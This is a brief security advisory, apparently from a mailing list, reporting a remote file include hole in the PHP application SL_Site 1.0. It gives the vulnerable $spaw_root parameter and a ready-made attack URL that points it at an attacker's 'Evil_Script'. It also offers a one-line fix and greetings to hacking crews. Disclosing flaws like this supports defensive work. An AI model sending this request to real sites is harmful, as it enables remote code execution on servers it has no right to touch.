---------------------------------------------------------------------------

SL_Site <= 1.0 [spaw_root] Remote File Include Vulnerability

---------------------------------------------------------------------------



Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :

Remote : Yes

Critical Level : Dangerous

---------------------------------------------------------------------------


Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : SL_Site

version : 1.0

URL : ftp://ftp1.comscripts.com/PHP/2032_slsite-10.zip

------------------------------------------------------------------



Exploit:

~~~~~~

Variable $spaw_root not sanitized.When register_globals=on an attacker ca

n exploit this vulnerability with a simple php injection script.


# 
http://site.com/[path]/admin/editeur/spaw_control.class.php?spaw_root=[Evil_Script]

---------------------------------------------------------------------------


Solution :

~~~~~~~~

declare variabel $spaw_root

---------------------------------------------------------------------------



Shoutz:

~~~~


# Special greetz to my good friend [Oo]

# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]

---------------------------------------------------------------------------


*/


Contact:

~~~~~~


Nick: Kw3rLn

E-mail: ciriboflacs[at]YaHoo[dot]Com

Homepage: hTTp://RST-CREW.NET

_/*


-------------------------------- [ EOF] ----------------------------------

Reply via email to